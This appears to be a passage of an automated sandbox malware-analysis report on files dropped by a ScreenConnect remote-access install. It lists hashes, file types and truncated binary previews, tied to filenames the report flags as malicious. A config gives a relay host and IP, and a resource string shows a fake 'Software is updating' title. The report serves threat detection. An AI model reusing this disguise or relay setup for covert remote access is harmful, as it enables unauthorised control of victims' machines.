                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: statmentt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: statsment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: statmentt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: statsment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):569
                                                                                                                                                                                                                                                Entropy (8bit):5.0687349524326955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO4Y3IEm/vXbAa3xT:2dL9hK6E46YPzz8vH
                                                                                                                                                                                                                                                MD5:E374D37801CDEBE01DF27991F13BD78B
                                                                                                                                                                                                                                                SHA1:15FEBACF5CEB5FFB501A6ABD6384A85D625A066E
                                                                                                                                                                                                                                                SHA-256:71E7E3F4972BDD4CB98809973064F0A34A7E2377CC48E3C50017BA622E35F446
                                                                                                                                                                                                                                                SHA-512:BAFADD7B56FFAD46D64B01D860D4A269D65AD294C45BC7520F667DF5CAB2B5104DDC90E0FCD34A531093884349F349E96B5CF10344BAE261BEBD108166FCBCAE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>0bd0.adrsxpjm0rga0n.de=104.168.134.232-22%2f12%2f2024%2011%3a47%3a44</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                Entropy (8bit):4.954767818844449
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsfHwercjGu:rHy2DLI4MWoj12K9cAufHc6u
                                                                                                                                                                                                                                                MD5:9C24F61262ED0D4387EA690B3AD44A07
                                                                                                                                                                                                                                                SHA1:00C16E72CCF6A23982C266D03B8BABE31AFA93E6
                                                                                                                                                                                                                                                SHA-256:69D2A286D560A178920010EE592F73CE28B2CCB3C564766F4B78951C7F220A40
                                                                                                                                                                                                                                                SHA-512:0E787D5923D8918648968FC234D04D30AD0C8B3D2DC8D050B2E59012C40E2CB28D48C409C321DCB09CB78117C0A71F3C01080DB96F36EED9F3BD1FDD5A3AE1FE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......;Software is updating... Please do not turn off your device.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50133
                                                                                                                                                                                                                                                Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):26722
                                                                                                                                                                                                                                                Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                Malicious:false
